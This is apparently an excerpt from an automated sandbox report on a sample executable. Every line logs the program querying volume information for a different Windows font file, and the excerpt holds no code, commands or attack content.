                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
